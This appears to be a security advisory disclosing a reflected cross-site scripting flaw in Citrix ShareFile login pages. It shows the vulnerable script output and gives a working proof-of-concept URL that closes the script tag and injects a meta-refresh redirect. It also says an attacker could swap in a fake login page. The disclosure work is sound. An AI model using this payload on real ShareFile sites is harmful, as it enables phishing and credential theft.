A security-related issue with Citrix ShareFile login pages has been discovered. The issue is a reflected cross-site scripting attack which could allow a malicious actor to steal login credentials, tokens, execute code in the context of a victim's browser, or perform a variety of other malicious actions.
Citrix has elected not to publish information regarding this issue or provide notice to customers.
This issue can be triggered by visiting any of the login pages on a ShareFile domain:
- https://<ShareFile Customer Prefix>.sharefile.com/Authentication/Login
- https://<ShareFile Customer Prefix>.sharefile.com/Authentication/StartLogin
- https://<ShareFile Customer Prefix>.sharefile.com/login
- https://<ShareFile Customer Prefix>.sharefile.com/oauth/authorize
- And potentially others.
When a request for the login page is sent, some processing appears to be done server-side to prepare responses containing client-side javascript. In particular, request parameters are inserted into the "oAuthViewModel" variable in an unsafe manner. For example, a standard request to the login page produces a script within the response containing the following:
-----
Requested URL: https://tenable.sharefile.com
Redirected URL: https://tenable.sharefile.com/oauth/authorize?client_id=S---REDACTED---y&scope=&response_type=code&redirect_uri=https%3A%2F%2Fauth.sharefile.io%2Fsignin-sharefile&state=C---REDACTED---&subdomain=tenable
-----
<script nonce="qKbH---REDACTED---6GLZ6A==">
oAuthViewModel = {"ApiUrl":"https://tenable.sharefile.com/sf/v3/","OAuthUrl":"https://tenable.sharefile.com/oauth/oauthapi.aspx","CachePath":"/cache/---REDACTED---/","ErrorCorrelationId":"---REDACTED---","Theme":{"Name":"onecitrix"},"PageWidth":"device-width","FixViewport":false,"ToolLinkText":"Citrix Systems, Inc. WCS Authentication","ToolLinkNavigateUrl":"http://https://www.sharefile.com","ClientInfoVisible":false,"WebflowSettings":{"ClientId":"S---REDACTED---y","State":"C---REDACTED---_","RedirectUri":"https://auth.sharefile.io/signin-sharefile","SamlNoIframe":false,"ResponseType":"code","Hash":"","Username":"","Email":null,"SubDomain":"tenable","RequireV3":false,"Animations":false,"BaseUrl":"tenable.sharefile.com","CompanyName":"ShareFile","Capabilities":[""],"ResetId":"","Action":null,"AutoRedirect":false,"SSOInfo":{"Info":[],"AppControlPlane":"sharefile.com","ApiControlPlane":"sf-api.com","IsComponentSpaceEnabled":false,"odata.metadata":"https://tenable.sf-api.com/sf/v3/$metadata#SSOInfo/ShareFile.Api.Models.SSOInfo@Element","odata.type":"ShareFile.Api.Models.SSOInfo","Id":null,"url":"https://tenable.sf-api.com/sf/v3/SSOInfo"},"AppCode":"SFIdentity","LogoUrl":null,"LogoBackgroundColor":null,"BackdropColor":null,"LoginPageText":null,"HeaderBackgroundUrl":null,"HeaderBackgroundColor":null,"LoginPageBackgroundColor":null,"LoginPageBackgroundImageUrl":null,"LoginPageSSOSignInTitle":null,"LoginPageShareFileSignInTitle":null,"FavIconUrl":null,"DeviceIdSupported":false,"DeviceId":null},"IsWebAppClient":true,"Title":"ShareFile Login","MarketingSiteMetaTagDescription":null,"IsSecureSubdomain":false,"IsProductionAppDomain":true,"ActivationToken":"","PromptLoginAfterActivation":false,"UserTokenType":null,"UserToken":null,"UserHint":"","LoginPageType":0,"WebpopLoginPageType":0,"NoJavascriptUrl":"/oauth/oauthwebflow_invalid.aspx?error=NoJavaScript","ErrorMessage":null, ...};
</script>
-----
In the above, the parameters included in the redirected request URL are inserted into the snippet of javascript. These parameters can be manipulated in order to insert unsafe elements into the page, which can lead to cross-site scripting, html injection, redirection, etc. In order to exploit this issue, a tag to prematurely close the "<script>" containing the "oAuthViewModel" needs to be included, which then allows for further injection.
As a proof of concept, if a user were somehow tricked into visiting the following URL, they would be redirected to "https://tenable.com". An attacker could replace this redirection with a mock login page for ShareFile or some other seemingly innocuous service. The proof of concept below uses the "a" parameter as the injection point, though it appears that all potential request variables, as well as other variables inserted into the oAuthViewModel variable are affected.
Proof of concept:
-----
https://tenable.sharefile.com/login?cmd=route&id=/&a=</script><meta http-equiv=refresh content='0; URL=https://tenable.com' />
-----